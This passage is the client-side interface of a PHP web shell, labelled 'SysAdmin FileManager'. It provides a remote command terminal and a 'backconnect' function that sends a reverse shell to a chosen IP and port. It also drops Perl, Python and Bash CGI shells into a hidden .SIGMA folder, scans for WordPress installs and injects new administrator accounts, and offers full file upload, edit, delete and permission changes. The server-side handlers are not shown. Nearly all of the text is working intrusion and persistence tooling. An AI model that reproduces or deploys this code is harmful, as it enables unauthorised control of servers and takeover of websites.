type="email" id="wp_email" value="admin@example.com"> <button onclick="addWordPressAdmin()" class="btn btn-success" style="width:100%">Add Admin User</button> </div> </div> </div> </div> </div> <!-- Command Shell --> <div class="shell-section"> <div class="shell-header">Terminal</div> <div class="shell-input"> <input type="text" id="cmdInput" placeholder="Enter command..." onkeypress="if(event.keyCode==13) executeCommand()"> <button onclick="executeCommand()" class="btn btn-primary">Execute</button> <button onclick="clearOutput()" class="btn">Clear</button> </div> <div class="shell-output" id="shellOutput"></div> </div> </div> <!-- Modals --> <div id="uploadModal" class="modal"> <div class="modal-content"> <div class="modal-header"><h3>Upload File</h3><span class="close" onclick="closeModal('upload')">×</span></div> <form id="uploadForm" enctype="multipart/form-data"> <div class="form-group"><label>Select File</label><input type="file" name="file" required></div> <div class="modal-footer"> <button type="button" onclick="closeModal('upload')" class="btn">Cancel</button> <button type="submit" class="btn btn-primary">Upload</button> </div> </form> </div> </div> <div id="mkdirModal" class="modal"> <div class="modal-content"> <div class="modal-header"><h3>Create Directory</h3><span class="close" onclick="closeModal('mkdir')">×</span></div> <form id="mkdirForm"> <div class="form-group"><label>Directory Name</label><input type="text" name="dir_name" required></div> <div class="modal-footer"> <button type="button" onclick="closeModal('mkdir')" class="btn">Cancel</button> <button type="submit" class="btn btn-success">Create</button> </div> </form> </div> </div> <div id="mkfileModal" class="modal"> <div class="modal-content" style="min-width:600px"> <div class="modal-header"><h3>Create File</h3><span class="close" onclick="closeModal('mkfile')">×</span></div> <form id="mkfileForm"> <div class="form-group"><label>File Name</label><input type="text" name="file_name" required></div> <div class="form-group"><label>Content</label><textarea name="content" rows="10"></textarea></div> <div class="modal-footer"> <button type="button" onclick="closeModal('mkfile')" class="btn">Cancel</button> <button type="submit" class="btn btn-warning">Create</button> </div> </form> </div> </div> <div id="renameModal" class="modal"> <div class="modal-content"> <div class="modal-header"><h3>Rename</h3><span class="close" onclick="closeModal('rename')">×</span></div> <form id="renameForm"> <input type="hidden" name="old_path" id="old_path"> <div class="form-group"><label>New Name</label><input type="text" name="new_path" id="new_path" required></div> <div class="modal-footer"> <button type="button" onclick="closeModal('rename')" class="btn">Cancel</button> <button type="submit" class="btn btn-primary">Rename</button> </div> </form> </div> </div> <div id="chmodModal" class="modal"> <div class="modal-content"> <div class="modal-header"><h3>Change Permissions</h3><span class="close" onclick="closeModal('chmod')">×</span></div> <form id="chmodForm"> <input type="hidden" name="path" id="chmod_path"> <div class="form-group"><label>Permissions (e.g., 0755)</label><input type="text" name="perms" id="chmod_perms" required pattern="[0-7]{4}" placeholder="0755"></div> <div class="modal-footer"> <button type="button" onclick="closeModal('chmod')" class="btn">Cancel</button> <button type="submit" class="btn btn-primary">Change</button> </div> </form> </div> </div> <div id="editModal" class="modal"> <div class="modal-content" style="min-width:800px"> <div class="modal-header"><h3>Edit File: <span id="editFileName"></span></h3><span class="close" onclick="closeModal('edit')">×</span></div> <form id="editForm"> <input type="hidden" name="file_path" id="edit_path"> <div class="form-group"><textarea name="content" id="edit_content" style="min-height:400px"></textarea></div> <div class="modal-footer"> <button type="button" onclick="closeModal('edit')" class="btn">Cancel</button> <button type="submit" class="btn btn-success">Save</button> </div> </form> </div> </div> <div id="deleteModal" class="modal"> <div class="modal-content"> <div class="modal-header"><h3>Confirm Delete</h3><span class="close" onclick="closeModal('delete')">×</span></div> <p id="deleteMessage" style="margin:20px 0; color:#e0e0e0;"></p> <form id="deleteForm"> <input type="hidden" name="path" id="delete_path"> <div class="modal-footer"> <button type="button" onclick="closeModal('delete')" class="btn">Cancel</button> <button type="submit" class="btn btn-danger">Delete</button> </div> </form> </div> </div> <script> let currentDir = '<?php echo addslashes($cwd); ?>'; let wpSites = []; // Utility Functions function showAlert(msg, type = 'success') { const alert = document.createElement('div'); alert.className = `alert ${type}`; alert.textContent = msg; document.body.appendChild(alert); setTimeout(() => alert.remove(), 3000); } function showModal(type) { document.getElementById(type + 'Modal').style.display = 'block'; } function closeModal(type) { document.getElementById(type + 'Modal').style.display = 'none'; } function showTab(tab) { document.querySelectorAll('.tab-content').forEach(t => t.classList.add('hidden')); document.getElementById('tab-' + tab).classList.remove('hidden'); document.querySelectorAll('.tab-btn').forEach(btn => btn.classList.remove('active')); event.target.classList.add('active'); if (tab === 'files') loadFileList(); } function toggleTool(header) { header.classList.toggle('collapsed'); header.nextElementSibling.classList.toggle('collapsed'); } // File Manager Functions function loadFileList() { const tbody = document.getElementById('fileList'); tbody.innerHTML = '<tr><td colspan="6" style="text-align:center; padding:40px;"><span class="spinner"></span> Loading...</td></tr>'; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=list&dir=' + encodeURIComponent(currentDir) }) .then(r => r.json()) .then(data => { if (data.success && data.data) { renderFileList(data.data); } }); } function renderFileList(items) { let html = ''; if (currentDir !== '/') { html += '<tr><td colspan="6"><a href="#" onclick="changeDir(\'' + currentDir.substring(0, currentDir.lastIndexOf('/')) + '\')" class="dir">.. (Parent Directory)</a></td></tr>'; } items.forEach(item => { const size = item.type === 'dir' ? '-' : formatSize(item.size); const date = new Date(item.mtime * 1000).toLocaleString('en-US', { year:'numeric', month:'2-digit', day:'2-digit', hour:'2-digit', minute:'2-digit', second:'2-digit' }); const path = encodeURIComponent(item.path); const name = encodeURIComponent(item.name); html += '<tr data-path="' + item.path + '" data-type="' + item.type + '">'; html += '<td style="max-width:200px; overflow:hidden; text-overflow:ellipsis;">'; if (item.type === 'dir') { html += '<a href="#" onclick="changeDir(\'' + item.path + '\')" class="dir">' + item.name + '/</a>'; } else { html += '<span class="file" title="' + item.name + '">' + item.name + '</span>'; } html += '</td>'; html += '<td class="size">' + size + '</td>'; html += '<td class="perms">' + item.perms + '</td>'; html += '<td>' + item.owner + '/' + item.group + '</td>'; html += '<td style="font-size:11px;">' + date + '</td>'; html += '<td><div class="actions-cell">'; if (item.type === 'file') { html += '<button onclick="editFile(\'' + path + '\')" class="action-btn edit" title="Edit">Edit</button>'; html += '<button onclick="downloadFile(\'' + path + '\')" class="action-btn download" title="Download">Get</button>'; } html += '<button onclick="renameItem(\'' + path + '\', \'' + name + '\')" class="action-btn rename" title="Rename">Rnm</button>'; html += '<button onclick="chmodItem(\'' + path + '\', \'' + item.perms + '\')" class="action-btn perms" title="Chmod">Mod</button>'; html += '<button onclick="deleteItem(\'' + path + '\')" class="action-btn delete" title="Delete">Del</button>'; html += '</div></td></tr>'; }); document.getElementById('fileList').innerHTML = html; } function formatSize(bytes) { if (bytes >= 1073741824) return (bytes / 1073741824).toFixed(2) + ' GB'; if (bytes >= 1048576) return (bytes / 1048576).toFixed(2) + ' MB'; if (bytes >= 1024) return (bytes / 1024).toFixed(2) + ' KB'; return bytes + ' B'; } function changeDir(path) { currentDir = path; window.history.pushState({}, '', '?dir=' + encodeURIComponent(path)); loadFileList(); const parts = path.split('/').filter(p => p); let html = '<a href="#" onclick="changeDir(\'/\')">~</a>'; let p = ''; parts.forEach(part => { p += '/' + part; html += ' / <a href="#" onclick="changeDir(\'' + p + '\')">' + part + '</a>'; }); document.getElementById('currentPath').innerHTML = html; } function refreshDir() { loadFileList(); } function goUp() { changeDir(currentDir.substring(0, currentDir.lastIndexOf('/')) || '/'); } function renameItem(path, name) { path = decodeURIComponent(path); name = decodeURIComponent(name); document.getElementById('old_path').value = path; document.getElementById('new_path').value = path.substring(0, path.lastIndexOf('/') + 1) + name; showModal('rename'); } function deleteItem(path) { document.getElementById('delete_path').value = decodeURIComponent(path); document.getElementById('deleteMessage').textContent = 'Delete: ' + decodeURIComponent(path) + '?'; showModal('delete'); } function chmodItem(path, perms) { document.getElementById('chmod_path').value = decodeURIComponent(path); document.getElementById('chmod_perms').value = perms; showModal('chmod'); } function editFile(path) { path = decodeURIComponent(path); document.getElementById('edit_path').value = path; document.getElementById('editFileName').textContent = path.split('/').pop(); fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=read&file=' + encodeURIComponent(path) }) .then(r => r.json()) .then(data => { if (data.success) { document.getElementById('edit_content').value = data.data; showModal('edit'); } else { showAlert('Error loading file', 'error'); } }); } function downloadFile(path) { window.open('?action=download&file=' + path, '_blank'); } // Command Execution function executeCommand() { const cmd = document.getElementById('cmdInput').value; if (!cmd) return; const output = document.getElementById('shellOutput'); output.innerHTML += '<div style="color: #4a9eff;">$ ' + cmd + '</div>'; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=cmd&cmd=' + encodeURIComponent(cmd) + '&cwd=' + encodeURIComponent(currentDir) }) .then(r => r.json()) .then(data => { if (data.success) { output.innerHTML += '<div>' + (data.data || '').replace(/\n/g, '<br>') + '</div>'; } else { output.innerHTML += '<div style="color: #e74c3c;">Error: ' + data.message + '</div>'; } output.scrollTop = output.scrollHeight; }) .catch(e => output.innerHTML += '<div style="color: #e74c3c;">Error: ' + e + '</div>'); document.getElementById('cmdInput').value = ''; } function clearOutput() { document.getElementById('shellOutput').innerHTML = ''; } // Backconnect function backConnect() { const type = document.getElementById('bc_type').value; const ip = document.getElementById('bc_ip').value; const port = document.getElementById('bc_port').value; if (!ip || !port) { showAlert('IP and Port required', 'error'); return; } showAlert('Sending backconnect to ' + ip + ':' + port + ' using ' + type + '...', 'success'); fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=backconnect&type=' + type + '&ip=' + ip + '&port=' + port }) .then(r => r.json()) .then(data => { if (data.success) { showAlert(data.message, 'success'); } else { showAlert(data.message, 'error'); } }); } // CGI Shell (di folder .SIGMA) function createCGI(type) { let path; if (type === 'perl') path = document.getElementById('cgi_perl_path').value; else if (type === 'python') path = document.getElementById('cgi_python_path').value; else if (type === 'bash') path = document.getElementById('cgi_bash_path').value; if (!path) { showAlert('Path required', 'error'); return; } fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=cgi&cgi_type=' + type + '&cgi_path=' + encodeURIComponent(path) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert(data.message + ' in .SIGMA folder', 'success'); const container = document.getElementById('cgiIframeContainer'); const iframe = document.getElementById('cgiIframe'); const link = document.getElementById('cgiIframeLink'); iframe.src = data.full_url; link.href = data.full_url; container.style.display = 'block'; container.scrollIntoView({ behavior: 'smooth' }); } else { showAlert(data.message, 'error'); } }); } // WordPress (FIXED) function scanWordPress() { const path = document.getElementById('wp_scan_path').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=wp_scan&path=' + encodeURIComponent(path) }) .then(r => r.json()) .then(data => { if (data.success) { if (data.sites && data.sites.length > 0) { wpSites = data.sites; const select = document.getElementById('wp_sites'); select.innerHTML = ''; data.sites.forEach(site => { const option = document.createElement('option'); option.value = site; option.textContent = site; select.appendChild(option); }); document.getElementById('wp_sites_container').style.display = 'block'; document.getElementById('wp_form').style.display = 'block'; document.getElementById('wp_count_badge').textContent = 'Found ' + data.sites.length + ' WordPress installation(s)'; showAlert('Found ' + data.sites.length + ' WordPress sites', 'success'); } else { document.getElementById('wp_sites_container').style.display = 'none'; document.getElementById('wp_form').style.display = 'none'; showAlert('No WordPress sites found (wp-load.php missing)', 'error'); } } }); } function addWordPressAdmin() { const select = document.getElementById('wp_sites'); const path = select.value; const user = document.getElementById('wp_user').value; const pass = document.getElementById('wp_pass').value; const email = document.getElementById('wp_email').value; if (!path || !user || !pass || !email) { showAlert('All fields required', 'error'); return; } showAlert('Creating admin user...', 'success'); fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=wp_add&wp_path=' + encodeURIComponent(path) + '&username=' + encodeURIComponent(user) + '&password=' + encodeURIComponent(pass) + '&email=' + encodeURIComponent(email) }) .then(r => r.json()) .then(data => { showAlert(data.message, data.success ? 'success' : 'error'); if (data.success) { // Clear form document.getElementById('wp_user').value = ''; document.getElementById('wp_pass').value = ''; document.getElementById('wp_email').value = ''; } }); } // Form Handlers document.getElementById('uploadForm')?.addEventListener('submit', e => { e.preventDefault(); const fd = new FormData(); fd.append('action', 'upload'); fd.append('path', currentDir); fd.append('file', document.querySelector('#uploadForm input[type=file]').files[0]); fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest' }, body: fd }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Uploaded successfully'); closeModal('upload'); loadFileList(); } else { showAlert('Upload failed', 'error'); } }); }); document.getElementById('mkdirForm')?.addEventListener('submit', e => { e.preventDefault(); const dir = currentDir + '/' + document.querySelector('#mkdirForm input[name=dir_name]').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=mkdir&dir=' + encodeURIComponent(dir) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Directory created'); closeModal('mkdir'); loadFileList(); } else { showAlert('Creation failed', 'error'); } }); }); document.getElementById('mkfileForm')?.addEventListener('submit', e => { e.preventDefault(); const file = currentDir + '/' + document.querySelector('#mkfileForm input[name=file_name]').value; const content = document.querySelector('#mkfileForm textarea[name=content]').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=mkfile&file=' + encodeURIComponent(file) + '&content=' + encodeURIComponent(content) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('File created'); closeModal('mkfile'); loadFileList(); } else { showAlert('Creation failed', 'error'); } }); }); document.getElementById('renameForm')?.addEventListener('submit', e => { e.preventDefault(); const old = document.getElementById('old_path').value; const newPath = document.getElementById('new_path').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=rename&old=' + encodeURIComponent(old) + '&new=' + encodeURIComponent(newPath) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Renamed'); closeModal('rename'); loadFileList(); } else { showAlert('Rename failed', 'error'); } }); }); document.getElementById('deleteForm')?.addEventListener('submit', e => { e.preventDefault(); const path = document.getElementById('delete_path').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=delete&path=' + encodeURIComponent(path) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Deleted'); closeModal('delete'); loadFileList(); } else { showAlert('Delete failed', 'error'); } }); }); document.getElementById('chmodForm')?.addEventListener('submit', e => { e.preventDefault(); const path = document.getElementById('chmod_path').value; const perms = document.getElementById('chmod_perms').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=chmod&path=' + encodeURIComponent(path) + '&perms=' + perms }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Permissions changed'); closeModal('chmod'); loadFileList(); } else { showAlert('Chmod failed', 'error'); } }); }); document.getElementById('editForm')?.addEventListener('submit', e => { e.preventDefault(); const file = document.getElementById('edit_path').value; const content = document.getElementById('edit_content').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=save&file=' + encodeURIComponent(file) + '&content=' + encodeURIComponent(content) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Saved'); closeModal('edit'); } else { showAlert('Save failed', 'error'); } }); }); window.onclick = e => { document.querySelectorAll('.modal').forEach(m => { if (e.target === m) m.style.display = 'none'; }); }; // Load initial file list loadFileList(); </script> </body> </html>
💾 Save Changes
Cancel
SysAdmin FileManager | Path: /tmp | Writable: Yes
🗑️ Confirm Delete
Are you sure you want to delete
?
This action cannot be undone!
Cancel
Delete
📝 Rename
Cancel
Rename